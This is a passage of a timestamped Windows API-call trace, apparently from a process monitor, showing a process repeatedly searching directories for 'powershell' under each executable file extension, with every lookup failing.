	[0578.845] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0578.853] SetErrorMode (uMode=0x1) returned 0x1
	[0578.854] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0578.854] SetErrorMode (uMode=0x1) returned 0x1
	[0578.854] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0578.863] SetErrorMode (uMode=0x1) returned 0x1
	[0578.864] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0578.864] SetErrorMode (uMode=0x1) returned 0x1
	[0578.864] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0578.873] SetErrorMode (uMode=0x1) returned 0x1
	[0578.874] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0578.874] SetErrorMode (uMode=0x1) returned 0x1
	[0578.874] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0578.882] SetErrorMode (uMode=0x1) returned 0x1
	[0578.884] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0578.884] SetErrorMode (uMode=0x1) returned 0x1
	[0578.884] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.615] SetErrorMode (uMode=0x1) returned 0x1
	[0580.616] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0580.616] SetErrorMode (uMode=0x1) returned 0x1
	[0580.616] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.624] SetErrorMode (uMode=0x1) returned 0x1
	[0580.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.626] SetErrorMode (uMode=0x1) returned 0x1
	[0580.626] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.626] SetErrorMode (uMode=0x1) returned 0x1
	[0580.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.627] SetErrorMode (uMode=0x1) returned 0x1
	[0580.627] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.627] SetErrorMode (uMode=0x1) returned 0x1
	[0580.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.627] SetErrorMode (uMode=0x1) returned 0x1
	[0580.628] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.628] SetErrorMode (uMode=0x1) returned 0x1
	[0580.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.628] SetErrorMode (uMode=0x1) returned 0x1
	[0580.628] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.629] SetErrorMode (uMode=0x1) returned 0x1
	[0580.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.629] SetErrorMode (uMode=0x1) returned 0x1
	[0580.629] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.629] SetErrorMode (uMode=0x1) returned 0x1
	[0580.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.629] SetErrorMode (uMode=0x1) returned 0x1
	[0580.630] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.630] SetErrorMode (uMode=0x1) returned 0x1
	[0580.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.630] SetErrorMode (uMode=0x1) returned 0x1
	[0580.630] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.630] SetErrorMode (uMode=0x1) returned 0x1
	[0580.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.631] SetErrorMode (uMode=0x1) returned 0x1
	[0580.631] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.631] SetErrorMode (uMode=0x1) returned 0x1
	[0580.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.632] SetErrorMode (uMode=0x1) returned 0x1
	[0580.632] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.632] SetErrorMode (uMode=0x1) returned 0x1
	[0580.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.632] SetErrorMode (uMode=0x1) returned 0x1
	[0580.632] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.633] SetErrorMode (uMode=0x1) returned 0x1
	[0580.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.633] SetErrorMode (uMode=0x1) returned 0x1
	[0580.633] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.633] SetErrorMode (uMode=0x1) returned 0x1
	[0580.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.634] SetErrorMode (uMode=0x1) returned 0x1
	[0580.634] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.634] SetErrorMode (uMode=0x1) returned 0x1
	[0580.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.634] SetErrorMode (uMode=0x1) returned 0x1
	[0580.634] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.635] SetErrorMode (uMode=0x1) returned 0x1
	[0580.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.635] SetErrorMode (uMode=0x1) returned 0x1
	[0580.635] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.635] SetErrorMode (uMode=0x1) returned 0x1
	[0580.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0580.636] SetErrorMode (uMode=0x1) returned 0x1
	[0580.636] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.636] SetErrorMode (uMode=0x1) returned 0x1
	[0580.636] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.636] SetErrorMode (uMode=0x1) returned 0x1
	[0580.636] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.637] SetErrorMode (uMode=0x1) returned 0x1
	[0580.637] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.637] SetErrorMode (uMode=0x1) returned 0x1
	[0580.637] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.637] SetErrorMode (uMode=0x1) returned 0x1
	[0580.637] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.638] SetErrorMode (uMode=0x1) returned 0x1
	[0580.638] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.638] SetErrorMode (uMode=0x1) returned 0x1
	[0580.638] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.638] SetErrorMode (uMode=0x1) returned 0x1
	[0580.638] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.639] SetErrorMode (uMode=0x1) returned 0x1
	[0580.639] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.639] SetErrorMode (uMode=0x1) returned 0x1
	[0580.639] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.639] SetErrorMode (uMode=0x1) returned 0x1
	[0580.640] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.640] SetErrorMode (uMode=0x1) returned 0x1
	[0580.640] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.640] SetErrorMode (uMode=0x1) returned 0x1
	[0580.640] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.640] SetErrorMode (uMode=0x1) returned 0x1
	[0580.641] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.641] SetErrorMode (uMode=0x1) returned 0x1
	[0580.641] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.641] SetErrorMode (uMode=0x1) returned 0x1
	[0580.641] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.642] SetErrorMode (uMode=0x1) returned 0x1
	[0580.642] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.642] SetErrorMode (uMode=0x1) returned 0x1
	[0580.642] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c71dac0 | out: lpFindFileData=0x1c71dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.642] SetErrorMode (uMode=0x1) returned 0x1
	[0580.642] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0580.643] SetErrorMode (uMode=0x1) returned 0x1
